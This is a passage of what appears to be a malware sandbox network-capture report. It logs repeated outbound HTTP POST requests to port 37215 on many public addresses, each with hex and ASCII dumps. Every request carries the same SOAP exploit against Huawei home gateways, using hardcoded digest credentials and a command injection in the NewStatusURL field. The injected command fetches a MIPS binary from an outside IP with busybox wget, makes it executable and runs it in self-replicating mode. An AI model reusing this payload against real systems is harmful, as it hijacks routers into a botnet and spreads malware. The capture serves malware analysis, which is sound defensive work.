                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2302192.168.2.235955641.153.71.20837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.579617023 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2303192.168.2.233519480.241.73.18637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.579627037 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2304192.168.2.233368841.246.124.17437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.579766989 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2305192.168.2.233527241.99.57.17537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.579787016 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2306192.168.2.2339026197.86.222.2837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.583312988 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2307192.168.2.2360428157.171.124.24137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.583724976 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2308192.168.2.2346910170.50.240.21837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.584769964 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2309192.168.2.2346876197.18.211.18237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.584840059 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2310192.168.2.233893641.125.192.13237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.584963083 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2311192.168.2.2340968157.198.159.4737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.585021973 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
